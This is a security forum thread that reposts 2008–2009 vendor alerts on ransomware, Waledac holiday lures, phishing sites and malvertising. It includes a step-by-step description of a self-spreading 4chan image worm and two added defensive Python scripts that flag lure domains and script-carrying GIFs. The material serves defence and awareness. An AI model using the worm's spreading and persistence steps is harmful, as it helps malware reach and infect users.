Nov. 28, 2008 - "...Just recently... a new version of the GPcode ransomware has surfaced... It drops several files which are also detected as TROJ_RANDSOM.A. After which, it searches and encrypts files found on any readable and writable drive on the system, rendering them inaccessible (without the encryption key). It also changes the file name of the encrypted files, by adding the .XNC extension. It also drops the file READ THIS.TXT in each folder that contains an encrypted file. This file informs the victim that the files have been encrypted, and that a decrypting tool must be purchased to decrypt the files. Email addresses are also included in the text file, which the victim must contact to obtain the decryption tool. Accordingly, the perpetrator of this crime demands £200 (US$307) for the decryption services... Users are strongly advised to back up their files so as not to be victimized by ransomware."
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2008-12-03, 04:30
FYI...
McDonald's and Coca-Cola - malicious holiday Coupons and Promotions
- http://securitylabs.websense.com/content/Alerts/3250.aspx
12.02.2008 - "Websense... has discovered another infectious holiday email making the rounds. Victims are receiving messages promoting a coupon from McDonald's or a holiday promotion from the Coca-Cola company. Both messages include a .zip attachment that contains either coupon.exe or promotion.exe. The malicious files (SHA1 ca973b0e458f0e0cca13636bd88784b80ccae24d) are Trojan Droppers, but have low anti-virus detection at the moment. The McDonald's email claims to present their latest discount menu, and states that the attached coupon should be printed. The Coca-Cola email states that the attachment has details about their new online game and a chance to win Coca-Cola drinks for life..."
(Screenshots available at the URL above.)
(More Screenshots):
- http://blog.trendmicro.com/bogus-mcdonalds-coca-cola-promos-used-as-worm-carriers/
:fear::fear:
AplusWebMaster
2008-12-08, 20:27
FYI...
- http://securitylabs.websense.com/content/Alerts/3252.aspx
12.08.2008 - "The fraudulent email message references a real Microsoft Security Advisory 951306 (also known as CVE-2008-1436). The email provides instructions in both French and English. When the email's malicious attachment (MSC003-WIN.scr) is run, it connects via IRC to a BOT Controller, [removed]dns .be. This connection is not through the default port, but through port 81. The application binds to startup, ensuring it will be run automatically when the computer is restarted (as instructed in the email). The SHA1 of MSC003-WIN.scr is 2056c9fa1b97fca775cc7a01768fb39818963a94. Major antivirus vendors are -not- detecting the malicious attachment."
(Screenshot available at the URL above.)
:fear: :mad:
AplusWebMaster
2008-12-19, 18:33
FYI...
IE 7 exploit... attacks using Doc files
- http://preview.tinyurl.com/5wfx74
December 17, 2008 - (AvertLabs.com) - "... Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft Word document being sent out [SPAM] to an unsuspecting user. Upon opening the Word document the embedded ActiveX control... is instantiated and executed... The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file..."
:fear:
AplusWebMaster
2008-12-22, 19:51
FYI...
Another holiday, another e-card run - Waledec
- http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/
December 21, 2008 - "But this time it’s not Storm, nor does it even seem at all like Storm. This one is dubbed Waledec. Infection strategy: entice email users to come to the website and get a greeting card. No graphics, but it will entice you anyhow. “Daniel just mailed to you an Online greeting card.” Thanks, Daniel!
Subject lines I’ve seen in our spamtraps:
• Merry Christmas greetings for you
• You have received an eCard
The website you go to says, “Merry Christmas”, and “If you don’t see your greeting card, just click here to download it.”. Here comes /ecard.exe, as always, via a meta-refresh. No HTTP browser exploits on the site. This is hosted on a fast flux network... The ecard.exe binary is pretty much malcode, as you would expect... Pretty weak detection when we look via VirusTotal*. Two vendors dubbed it Waledec...
• Microsoft 1.4205 2008.12.20 Trojan:Win32/Waledac.A
• NOD32 3709 2008.12.20 a variant of Win32/Waledac ..."
* http://www.virustotal.com/analisis/a0cc84fb1efa809c068a029cbc1e27f5
:fear:
AplusWebMaster
2008-12-26, 16:30
FYI...
Christmas e-card malware...
- http://isc.sans.org/diary.html?storyid=5557
Last Updated: 2008-12-26 03:12:19 UTC ...(Version: 2) - "... over the last (few) days there has been an increase in malicious Christmas cards distributing the Waledac worm. The e-mails consist of a hyperlink to a "Christmas card"... The user will need to click on either button, get a Security Warning and will need to accept the fact that an executable is being run... Some of the domains that were reported to us by readers (thanks Mike and the Shadowserver foundation) include:
Note that this list is still very much incomplete. We may post updates.
For now, we recommend:
• Blocking the download of 'ecard.exe', or the affiliated domains on your corporate proxy;
• Ensure that your anti virus and anti spam solutions are updated frequently as the AV vendors build coverage for this new threat. Given the mass mailing nature, spam protection is likely to be the first to pick up on this...
Arbor Networks has an interesting blog entry* up on the flux tactics involved with this threat here. For further data on the worm itself, visit Symantec's writeup**."
(Screenshot available at the ISC url above.)
* http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/
** http://www.symantec.com/norton/security_response/writeup.jsp?docid=2008-122308-1429-99&tabid=2
- http://blog.trendmicro.com/merry-malware-greetings-flooding-inboxes/
Dec. 26, 2008
:fear::fear::fear:
AplusWebMaster
2009-01-01, 18:01
FYI...
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231
31 December 2008 - "...A new trojan, which has been called a Waledac variant, appeared in recent weeks hyping up Christmas e-cards with nice inviting e-mails leading you to a cute website that you can get your e-card at... Lately the website has been peddling either "ecard.exe" or "postcard.exe" for download. But the fun does not end there. There's a nice little JavaScript reference pointing to "google-analysis.js" which has some nasty excitement embedded into it. The JavaScript currently loads a page from the domain "seocom .mobi" which in turn attempts to exploit the user and install a trojan which gets its commands from the same site. It is ultimately instructed to download and install the same Waledac trojan.
Fast-flux Domains
These e-mail lures have involved several different domains of which all are part of a fast flux network... The best option is to block the domains. The following is a list of all of the domains known to Shadowserver to be associated with the Waledac trojan: ...( see the Shadowserver URL above for the list of domains ) ...the trojan is fairly loud and starts beaconing right away to seeded hosts... we suspect the network is using some form of strong encryption for this communication...
Storm Worm?
Right! You are not the only one thinking this. In fact a lot of people are drawing similar comparisons. There are a ton of differences, but there's also a bunch of similarities for sure. Here's a few similarities we along with our fellow collaborators/security researchers have come up with:
• Fast-flux Network (domains are fast fluxing and name servers frequently change IPs)
• Several Name Servers per Domain (ns[1-6].<waledac.domain>)
• Use of Nginx (sure lots of people use it, but hey it's a similarity)
• Spreading through e-mail and Holiday Themes
• Use of "ecard.exe" and "postcard.exe" (both previously used by Storm)
• Drive-by Exploit in Domains (Storm previously used Neosploit) ...
Prevention and Detection
The first step as always is -not- to click the links from your e-mail. This will keep you relatively safe and Waledac free... Your next step is to block the above listed domains. There will surely be new ones added to the mix in the future, but blocking this will definitely help in the near term. Antivirus being up to date can't hurt either..."
:fear:
AplusWebMaster
2009-01-06, 02:44
FYI...
Twitter-Facebook Phishing...
- http://isc.sans.org/diary.html?storyid=5623
Last Updated: 2009-01-04 15:45:09 UTC - "Several readers have sent us information about a phishing attempt based on Twitter and possibly Facebook. It looks like the twitter folks have it well under control*, but as always with your Internet experience, vigilance and skepticism are your friends..."
* http://blog.twitter.com/2009/01/gone-phishing.html
January 03, 2009
- http://preview.tinyurl.com/73gm9n
01/05/2009 cgisecurity.net - "Days after a wave of phishing attacks fooled thousands of Twitter users, it appears that another security hole has been found by...someone... The Fox tweet was deleted an hour after it was posted, so the password may not have been changed... This can't be good for Twitter. It will be good for the people calling for more secure, standards based authentication on Twitter and elsewhere around the web."
- readwrite web
From Twitter's blog: http://blog.twitter.com/2009/01/monday-morning-madness.html
"...The issue with these 33 accounts is different from the Phishing scam aimed at Twitter users this weekend. These accounts were compromised by an individual who hacked into some of the tools our support team uses to help people do things like edit the email address associated with their Twitter account when they can't remember or get stuck. We considered this a very serious breach of security and immediately took the support tools offline. We'll put them back only when they're safe and secure"..."
- http://blog.trendmicro.com/so-is-it-twitter-or-facebook/
Jan. 5, 2009
:fear:
AplusWebMaster
2009-01-06, 17:38
FYI...
HMRC phishing email and website
- http://securitylabs.websense.com/content/Alerts/3276.aspx
01.06.2009 - "Websense... has discovered a phishing site emulating the Web site belonging to HM Revenue & Customs (HMRC), the UK government's taxation authority. The fake site is hosted in Denmark and uses the same stylesheet and graphics as the real HMRC Web site. Recipients first receive an email advising them that they are due a tax refund. This email contains a link to the phishing Web site. The phishing site aims to collect personal information such as name, address, and credit card information. Upon submitting the data, the user is redirected to the real HMRC site. The sending of the email is very timely with certain HMRC deadlines for online applications of tax returns imminent (31st January 2009). Websense has advised HMRC of this threat..."
(Screenshot of the phishing email available at the Websense URL above.)
:fear:
AplusWebMaster
2009-01-06, 18:05
FYI...
- http://blog.trendmicro.com/bogus-linkedin-profiles-harbor-malicious-content/
Jan. 5, 2009 - "The LinkedIn professional networking site connects more than 30 million users from across many different industries. The advantages of maintaining a list of trusted business contacts for career planning purposes are not lost on LinkedIn’s users. The fostering of business relationships is further enhanced by features such as LinkedIn Answers and access from mobile devices... found some bogus LinkedIn profiles which contain links to malware, using the names and images of famous personalities such as:
* Beyoncé Knowles
* Victoria Beckham
* Christina Ricci
* Kirsten Dunst
* Salma Hayek
* Kate Hudson
... and several others. Malicious links contained in these bogus profiles lead browsers through a series of redirections, but ultimately to malware. Note that there are several routes this infection path may take..."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2009-01-07, 13:58
FYI...
MLB.com pushing malware
- http://sunbeltblog.blogspot.com/2009/01/mlbcom-pushing-malware.html
January 06, 2009 - "... stay away from this site until they get it cleaned up. We are seeing various mlb sites redirecting to fake antivirus scan. These are almost certainly being done by malicious flash advertisements. Not the first time* it’s happened (courtesy of Innovative Marketing**)."
(Screenshot available at the URL above.)
* http://www.security-forums.com/viewtopic.php?p=272589
** http://sunbeltblog.blogspot.com/2008/12/innovative-marketing-saga-continues.html
- http://www.theregister.co.uk/2009/01/08/major_league_baseball_threat/
8 January 2009 - "... Update: MLB spokesman Matthew Gould said the tainted ads were the result of an individual who claimed to sell ads through a company the website has done business with before. After the scam came to light, MLB officials discovered this individual had no affiliation with the company, which Gould declined to name because he says MLB is pursuing legal action. Gould said MLB officials believe the ads were taken down on Monday, less than 24 hours after going live. "As soon as we were made aware of the problem we removed the ad in all instances across our network," he said..." (Pop-up image for "Antivirus2009" shown at the URL above.)
:fear::fear::mad:
AplusWebMaster
2009-01-09, 16:08
FYI...
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090109
9 January 2009 - "...we have a bunch of new and interesting information on the trojan, much of which has come from a number of security researchers out there. However, we are just going to touch on the last item and give you an updated list of domains associated with Waledac. You are bound to see all kinds of great research and interesting findings from others on this soon. In the meantime, please use this information to protect your networks and proactively (and retroactively) block these hosts. The following is a list of domains known to be associated with Waledac. Most of these domains have been seen in the wild and may be posted elsewhere. However, we want to provide our research that we have collected ourselves in a central spot for anyone to see and share.
Please DO NOT visit these domains as they are distributing malware both through the files they are peddling and via exploits.
Waledac Domain Listing (several new ones since our 12-31 post):
Related Exploit Domains (no new ones listed):
seocom .name
seocom .mobi
seofon .net
Please feel free to distribute the above list as you see fit..."
:fear::mad::fear:
AplusWebMaster
2009-01-09, 20:56
FYI...
- http://www.us-cert.gov/current/#malware_circulating_via_email_messages
January 9, 2009 - "US-CERT is aware of public reports of malicious code circulating via spam email messages related to the Israel/Hamas conflict in Gaza. These messages may contain factual information about the conflict and appear to come from CNN. Additionally, the messages indicate that additional news coverage of the conflict can be viewed by following a link provided in the email body. If users click on this link, they are redirected to a bogus CNN website that appears to contain a video. Users who attempt to view this video will be prompted to update to a new version of Adobe Flash Player in order to view the video. This update is -not- a legitimate Adobe Flash Player update; it is malicious code. If users download this executable file, malicious code may be installed on their systems..."
- http://www.rsa.com/blog/blog_entry.aspx?id=1416
(Screenshot at the RSA URL above.)
:fear: :mad:
AplusWebMaster
2009-01-12, 17:17
FYI...
Yandex used in SPAM redirects
- http://sunbeltblog.blogspot.com/2009/01/yandex-used-in-spam-redirects.html
January 11, 2009 - "We’re seeing a fair number of pages on Narod (a service that provides free web hosting, from Yandex, the Russian search engine). These are used for both redirects to malware, as well as redirects in spam... Administrators would be well advised to simply block any email or web traffic with narod .ru ."
:fear:
AplusWebMaster
2009-01-14, 23:48
FYI...
Malware directed at Classmates Online...
- http://securitylabs.websense.com/content/Blogs/3279.aspx
01.14.2009 - "Websense... noticed that a campaign against Classmates Online, Inc had broken out. We observed that thousands of URLs were registered in one day to spread the worm. The newly-registered URLs were unusually long, had several subdomains, and always contained some specific words such as process, multipart and so on... The new campaign was spread by email. The malicious email contained a link to a video invitation to reunite high school classmates and celebrate Classmates Day 2009. When the email recipient viewed the invitation, they downloaded a worm named Adobe_Player10.exe. This could fool a user into thinking they needed the latest version of the Adobe Player, prompting them to run the executable... the main purpose of this worm was to steal user information and send it to a server located in the Ukraine. The address of the server was hardcoded in the worm. The worm did a lot of work, including dropping a driver file to hide itself, injecting itself into every process, downloads and so on. It collected several kinds of information, including details about POP3, IMAP, ICQ, FTP, and certification from the user's MY certificate store, which is used to store trusted sites and personal certificates... The worm injected itself in every process. The injected code would enum a module of the process, and then hook some APIs into the module..."
(Screenshots available at the Websense URL above.)
:fear::fear:
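The ISC and Shadowserver posts above recommend blocking ecard.exe downloads and the lure domains at the corporate proxy, and the Websense post notes that the Classmates campaign used unusually long URLs with several subdomains. The following added example (not code from any of the quoted posts) runs those three checks over proxy log lines; the log format, the sample lines, the short blocklist and the length thresholds are constructed assumptions.

```python
"""Flag Waledac-style lure indicators in proxy access-log lines.

Added example, not code from the ISC, Shadowserver or Websense posts.
Each request is checked for: a download of one of the reported lure file
names, a host that is (or is a subdomain of) a blocked lure domain, and
an unusually long hostname with many labels.  Log format, sample lines,
blocklist and thresholds are constructed for this example.
"""
import re
from urllib.parse import urlsplit

# Constructed blocklist: a few lure domains named in the quoted posts,
# stored without the defanging space used on the forum.
BLOCKED_DOMAINS = {
    "superchristmasday.com",
    "cardnewyear.com",
    "seocom.mobi",
    "narod.ru",
}

# File names the quoted posts report the lure pages serving.
LURE_FILES = {"ecard.exe", "postcard.exe", "adobe_player10.exe"}

# Heuristic thresholds (assumptions, not values from the posts).
MAX_LABELS = 5      # more DNS labels than this counts as "several subdomains"
MAX_HOST_LEN = 60   # longer hostnames count as "unusually long"

# Constructed log format: <epoch> <client_ip> <status> <method> <url>
LINE_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\S+) (\S+)$")


def host_is_blocked(host, blocklist=BLOCKED_DOMAINS):
    """True if host equals a blocked domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in blocklist)


def check_url(url):
    """Return the list of indicator names that match this URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    filename = parts.path.rsplit("/", 1)[-1].lower()
    hits = []
    if filename in LURE_FILES:
        hits.append("lure-file")
    if host_is_blocked(host):
        hits.append("blocked-domain")
    labels = host.split(".") if host else []
    if len(labels) > MAX_LABELS or len(host) > MAX_HOST_LEN:
        hits.append("suspicious-host")
    return hits


def scan_log(lines):
    """Parse log lines; return (client_ip, url, hits) for flagged requests."""
    flagged = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        _ts, client, _status, _method, url = m.groups()
        hits = check_url(url)
        if hits:
            flagged.append((client, url, hits))
    return flagged


# Constructed sample log lines.
SAMPLE_LOG = [
    "1230000001 10.1.1.5 200 GET http://www.example.org/index.html",
    "1230000002 10.1.1.7 200 GET http://superchristmasday.com/ecard.exe",
    "1230000003 10.1.1.9 302 GET http://ns3.cardnewyear.com/",
    "1230000004 10.1.1.9 200 GET http://a.b.c.d.e.f.process.multipart.example.net/video.php",
    "1230000005 10.1.1.2 200 GET http://img.example.com/postcard.exe",
    "garbage line",
]

if __name__ == "__main__":
    for client, url, hits in scan_log(SAMPLE_LOG):
        print(f"{client}  {', '.join(hits)}  {url}")
```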
AplusWebMaster
2009-01-15, 19:19
FYI...
Spam, Phishing, and Malware related to Presidential Inauguration
- http://www.us-cert.gov/current/#spam_phishing_and_malware_related
January 15, 2009 - "US-CERT has received reports of an increased number of phishing sites and spam related to the upcoming Presidential Inauguration. US-CERT reminds users that phishing and spamming campaigns often coincide with highly publicized events...
US-CERT encourages users and administrators to take the following preventative measures to help mitigate the security risks:
• Install antivirus software, and keep the virus signatures up to date.
• Do not follow unsolicited links and do not open unsolicited email messages.
• Use caution when visiting untrusted websites..."
- http://blog.trendmicro.com/fake-obama-news-sites-abound/
Jan 18, 2009
- http://www.f-secure.com/weblog/archives/00001585.html
January 17, 2009 - "...All the links point to a file called speech.exe, which is a Waledec malware variant..."
- http://blog.trendmicro.com/dont-be-fooled-by-obama-inauguration-scams/
January 16, 2009
:fear::mad:
AplusWebMaster
2009-01-19, 16:06
FYI...
3322 .org
- http://isc.sans.org/diary.html?storyid=5710
Last Updated: 2009-01-19 12:01:36 UTC - "...adding the 3322-dot-org domain to your block list would be a good idea. As you can tell from this diary* that we published in 2007, it is by far not the first time that this domain shows up on our malware radar ..."
* http://isc.sans.org/diary.html?storyid=3266
:fear::spider::fear:
AplusWebMaster
2009-01-19, 22:51
FYI...
- http://www.theregister.co.uk/2009/01/19/obama_quitsmlaware_spam_scam/
19 January 2009
- http://preview.tinyurl.com/79ay3a
17 January 09 (PandaLabs blog) - "Today we discovered a botnet controlled, fast-flux operated malware campaign impersonating the United States President-elect Barack Obama’s website. The fake website looks just like the real thing and attempts to bait viewers into clicking a story entitled, “Barack Obama has refused to be a president”. When the user clicks on the link, the malware (W32\Iksmas.A.worm) begins to download all of the necessary files needed to host the fake site on the victim’s computer... The attack appears to have originated from China as the domains were purchased from a Chinese domain registrar called XINNET TECHNOLOGY CORPORATION. Xinnet has a history of abuse problems and we have contacted them to remove the domain names... The file names of the malware are:
• doc.exe , statement.exe , obamaspeech.exe , blog.exe , barack.exe , usa.exe , baracknews.exe , pdf.exe , news.exe , obamasblog.exe , barakblog.exe , statement.exe , president.exe , obamanews.exe ..."
:fear::spider::fear:
AplusWebMaster
2009-01-20, 20:33
FYI...
Inauguration Themed Waledac - New Tactics & New Domains
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090119
January 19, 2009 - "...the Inauguration of Barack Obama and the Waledac trojan has been in full swing attempting to take advantage of the event. Since late last week the trojan has been blasting its way across the Internet with e-mails attempting to bring unwitting users to a page that looks a lot like the official Barack Obama website. The page is updated each day to appear to have a new blog entry... As always do NOT visit these domains as they are malicious and hosting exploit code... Click here* for a full listing of Waledac domains that we are aware of - this link will be updated as we get them. Your best bet is to block these domains or otherwise avoid them..."
* http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
:fear::spider::mad:
AplusWebMaster
2009-01-21, 14:32
FYI...
Phishing Alert - Canada Revenue Agency
- http://securitylabs.websense.com/content/Alerts/3282.aspx
01.20.2009 - "Websense... has discovered phishing sites spoofing the Web site belonging to Canada Revenue Agency (CRA), the Canadian government’s taxation authority. The fake site is hosted in Germany and uses the same stylesheet and graphics as the real CRA Web site. The phishing site aims to collect personal information such as the victim’s social insurance number, full name, address, date of birth, mother’s maiden name, and credit card information. Upon submitting the data, the user is redirected to the real CRA site. This campaign is timed to coincide with the upcoming CRA deadline for online tax return applications..."
:fear::mad:
AplusWebMaster
2009-01-23, 13:52
FYI...
United Airlines - e-mail scam malware attack
- http://www.sophos.com/blogs/gc/g/2009/01/19/united-airlines-malware-attack/
January 19, 2009 - "Last week... spammers were sending out emails posing as messages from Northwest Airlines*. The attached file was not an electronic airline ticket of course, but a Trojan horse designed to infect your computer. As anticipated, the hackers have made a simple switch - changing the bait from a Northwest Airlines email to one claiming to come from United Airlines, and spoofing the email address tickets@united .com ... As before, opening the ZIP file is a very bad idea. Although it’s understandable that you might panic into thinking that your credit card has been debited without your permission, for a flight you don’t want or need, you should be cynical enough to smell this for what it is - a dirty rotten scam designed to infect your personal computer."
* http://www.sophos.com/blogs/gc/g/2009/01/14/northwest-airlines-malware-attack/
(Screenshots available at both URLs above.)
Video: http://www.sophos.com/blogs/gc/g/2008/08/01/video-the-e-ticket-email-malware-campaign
:fear: :mad:
AplusWebMaster
2009-01-26, 22:13
FYI...
Valentine SPAM already!...
- http://blog.trendmicro.com/waledac-loves-to-spam-you/
Jan. 26, 2009 - "Holidays and popular annual events as a social engineering tool in spamming is a signature Storm technique. The following spammed email message should then cement WALEDAC’s association with the said bot giant...
Spammed Valentine’s greetings.
These messages flood inboxes weeks before Valentine’s day, also typical of previous Storm spam runs. Clicking on the link redirects a user to a site with heart images. When this page is clicked, the user is prompted to download a file, malicious of course, detected by Trend Micro as WORM_WALEDAC.AR... Besides the social engineering techniques used in email, the following are similar methods applied by this worm family:
• Fast-flux networks and several different name servers used per domain
• File names ecard.exe and postcard.exe
• In some instances, the installation of rogue antispyware ..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-01-27, 18:39
FYI...
IEC website compromised
- http://securitylabs.websense.com/content/Alerts/3289.aspx
01.27.2009 - "Websense... has discovered that a subdomain of the International Electrotechnical Commission (IEC) Web site has been compromised. The IEC is an international standards organization that prepares and publishes International Standards for all electrical, electronic, and related technologies... The infected subdomain belongs to the TC26 group. Unprotected users would be subjected to execution of obfuscated Javascript that -redirects- to an exploit site, hosting exploits for Internet Explorer, QuickTime and AOL SuperBuddy. Successful execution of the exploit code incurs a drive-by download. This installs a backdoor on the compromised machine. Major antivirus vendors are -not- detecting this payload..."
(Screenshots available at the URL above.)
:fear::fear:
AplusWebMaster
2009-01-28, 18:05
FYI...
Fed Reserve Bank phish-about-phish
- http://www.hoax-slayer.com/federal-reserve-bank-scam-emails.shtml
28 January 2009 - "Email purporting to be from the Federal Reserve Bank claims that the U.S. Treasury Department has imposed restrictions on federal wire transfers due to a widespread phishing attack... Email is -not- from the Reserve Bank - Links lead to bogus websites... The FDIC published an alert* about the scam..."
* http://www.fdic.gov/news/news/SpecialAlert/2009/sa09020.html
FDIC: SA-20-2009 January 15, 2009
:fear::mad:
AplusWebMaster
2009-01-28, 22:28
FYI...
- http://www.pcmag.com/article2/0,2817,2339712,00.asp
01.27.09 Larry Seltzer - "...AVG has released research that indicates the number and volatility of web sites serving malicious code is increasing dramatically... Almost 60% of these sites are up for less than one day. The goal of these techniques seems to be to defeat blacklist-based protections. AVG calls them transient threats. What are these web pages? Few are actually put up to serve malware. Some of them are blog comments, some are advertisements, many are legitimate web sites corrupted through HTML/script injection, and many have been corrupted through compromises of SQL servers through SQL injection. These compromised web sites are tricked into redirecting users to the few sites that directly serve the malware. The combination of the Apache web server and PHP scripting engine is a favorite target of attackers. There are large numbers of vulnerabilities for attackers to exploit and no automated patch system to make sure servers are protected... The actual malware being served varies from fake codecs, game password-stealing attacks to fake anti-spyware. The fake codec sites are the most volatile, with 62% active for less than a day. The fake anti-spyware sites are more stable, but 28% are active less than a day and the average is less than 2 weeks..."
:fear::mad:
AplusWebMaster
2009-02-04, 21:05
FYI...
Work-At-Home Scams...
- http://www.ic3.gov/media/2009/090203.aspx
February 3, 2009 - "Consumers need to be vigilant when seeking employment on-line. The IC3 continues to receive numerous complaints from individuals who have fallen victim to work-at-home scams. Victims are often hired to "process payments", "transfer funds" or "reship products." These job scams involve the victims receiving and cashing fraudulent checks, transferring illegally obtained funds for the criminals, or receiving stolen merchandise and shipping it to the criminals. Other victims sign up to be a "mystery shopper", receiving fraudulent checks with instructions to cash the checks and wire the funds to "test" a company's services.
Victims are told they will be compensated with a portion of the merchandise or funds. Work-at-home schemes attract otherwise innocent individuals, causing them to become part of criminal schemes without realizing they are engaging in illegal behavior. Job scams often provide criminals the opportunity to commit identity theft when victims provide their personal information, sometimes even bank account information to their potential "employer." The criminal/employer can then use the victim's information to open credit cards, post on-line auctions, register Web sites, etc., in the victim's name to commit additional crimes..."
:fear::mad:
AplusWebMaster
2009-02-05, 15:22
FYI...
- http://blog.wired.com/27bstroke6/2009/02/atm.html
February 03, 2009 - "A carefully coordinated global ATM heist last November resulted in a one-day haul of $9 million in cash, after a hacker penetrated a server at payment processor RBS WorldPay... RBS WorldPay announced on December 23 that they'd been hacked, and personal information on approximately 1.5 million payroll-card and gift-card customers had been stolen. (Payroll cards are debit cards issued and recharged by employers as an alternative to paychecks and direct-deposit.) Now we know that account numbers and other mag-stripe data needed to clone the debit cards were also compromised in the breach. At the time, the company said it identified fraudulent activity on only 100 cards, making it sound like small beans. But it turns out the hacker managed to lift the withdrawal limits on those 100 cards, before dispatching a global army of cashers to drain them with repeated rapid-fire withdrawals. More than 130 ATMs in 49 cities from Moscow to Atlanta were hit simultaneously just after midnight Eastern Time on November 8. A class action lawsuit has been filed against RBS WorldPay on behalf of consumers..."
(Video available at the Wired URL above.)
- http://voices.washingtonpost.com/securityfix/2009/02/data_breach_led_to_multi-milli.html
February 5, 2009 - "...some $50 million was lost to ATM fraud in New York City alone over the course of one month last year..."
:mad::sick:
AplusWebMaster
2009-02-08, 02:16
FYI...
- http://isc.sans.org/diary.html?storyid=5821
Last Updated: 2009-02-07 21:51:03 UTC - "A Storm Center subscriber has just submitted malware embedded in .gif image files, downloaded from the image site 4chan.org. For the sake of expediency, and because this person did such a good write up, here is the analysis provided:
"The *.gif files were found (on) the "random" board of the image board site 4chan. The files contain a large picture with instructions to save the file with a .jse extension and run it. The *.out files are the result of applying scrdec to the gifs to reveal the encoded script. It appears to:
1) copy itself somewhere as 'sys.jse'
2) add itself to a Run key in the registry
3) a) fetch the index to 4chan's /b forum
b) download the first image
c) save it as 'j.jse'
d) attempt to run 'j.jse'
4) construct a POST request containing the image as payload
5) upload itself as a new post on 4chan
6) point an instance of IE at site it came from
(3)-(6) are in an infinite loop."
To the subscriber who did the legwork on this one, my thanx for the excellent work... will provide more data as it develops."
:fear::mad::fear:
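As an added example (not part of the ISC diary or the subscriber's write-up), here is a Python triage script for the carrier described above: a .gif that is meant to be renamed .jse and run. It walks the GIF block structure to find the trailer byte, reports any bytes appended after it, and searches for the JScript.Encode start/end markers (`#@~^` and `^#~@`) that bracket an encoded script. The 1x1 sample image and the appended script body are constructed, not taken from the 4chan files.

```python
"""Triage a GIF that may double as a JScript.Encode (.jse) script.

Added example, not from the ISC diary or the subscriber's analysis.
The sample GIF is a constructed 1x1 image; the appended "script" is
constructed filler, not a real payload.
"""
import struct

JSE_START = b"#@~^"   # JScript.Encode block start marker
JSE_END = b"^#~@"     # JScript.Encode block end marker


def _skip_subblocks(data: bytes, pos: int) -> int:
    """Advance past a chain of length-prefixed data sub-blocks (a 0 length ends it)."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def gif_trailer_offset(data: bytes) -> int:
    """Return the offset of the GIF trailer byte (0x3B) by walking the blocks."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF header")
    packed = data[10]                      # logical screen descriptor flags
    pos = 13                               # header (6) + screen descriptor (7)
    if packed & 0x80:                      # global color table present
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    while pos < len(data):
        tag = data[pos]
        if tag == 0x3B:                    # trailer
            return pos
        if tag == 0x2C:                    # image descriptor
            img_packed = data[pos + 9]
            pos += 10
            if img_packed & 0x80:          # local color table present
                pos += 3 * (2 ** ((img_packed & 0x07) + 1))
            pos += 1                       # LZW minimum code size
            pos = _skip_subblocks(data, pos)
        elif tag == 0x21:                  # extension: introducer + label
            pos = _skip_subblocks(data, pos + 2)
        else:
            raise ValueError(f"unexpected block tag 0x{tag:02x} at {pos}")
    raise ValueError("no GIF trailer found")


def triage_gif(data: bytes) -> dict:
    """Report trailing data and embedded JScript.Encode markers for one file."""
    trailer = gif_trailer_offset(data)
    trailing = len(data) - trailer - 1
    start = data.find(JSE_START)
    end = data.find(JSE_END, start) if start != -1 else -1
    return {
        "trailer_offset": trailer,
        "trailing_bytes": trailing,
        "encoded_script_at": start,          # -1 when no marker is present
        "encoded_script_complete": start != -1 and end != -1,
        "suspicious": start != -1 or trailing > 0,
    }


# Constructed 35-byte 1x1 GIF: header, screen descriptor, 2-colour table,
# one image block and the 0x3B trailer.
CLEAN_GIF = (
    b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    + b"\x00\x00\x00\xff\xff\xff"
    + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    + b"\x02\x02\x44\x01\x00" + b"\x3b"
)

# Constructed polyglot: the same image with a fake encoded script appended.
POLYGLOT_GIF = CLEAN_GIF + JSE_START + b"AAAAAA==" + b"Zm9vYmFy" * 4 + b"==" + JSE_END

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_GIF), ("polyglot", POLYGLOT_GIF)):
        print(name, triage_gif(blob))
```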
AplusWebMaster
2009-02-10, 00:33
FYI...
Waledac new variant - Valentine's Day Theme
- http://securitylabs.websense.com/content/Alerts/3299.aspx
02.09.2009 - "... new spammed variant continues to use the Valentines theme. Once a user opens the URL in the spammed message, he is redirected to a site with 2 puppies and a love heart to give a Valentines theme. The user is then enticed to download a Valentines kit to prepare a present for a loved one, which is a new Waledac variant. This variant has a very low AV detection rate..."
- http://www.trustedsource.org/blog/182/New-Valentine-Scam-on-the-Loose
(Screenshot of spammed email available at both URLs above.)
Waledac Domain (Block) List - Updated 02-10-2009 - 4:21 UTC
- http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
- https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/239
02-09-2009 - "Up until recently, Waledac’s main purpose had been to peddle performance-enhancing pharmaceuticals by sending large runs of unsolicited mail to thousands of unwilling recipients. Today we noticed a shift in this trend. In addition to sending large volumes of spam, Waledac is now distributing misleading applications. In our testing we noticed that the misleading application that is installed this time around is MS AntiSpyware 2009..."
:fear::mad:
AplusWebMaster
2009-02-13, 02:25
FYI...
Skype Valentine SPAM lure
- http://securitylabs.websense.com/content/Alerts/3305.aspx
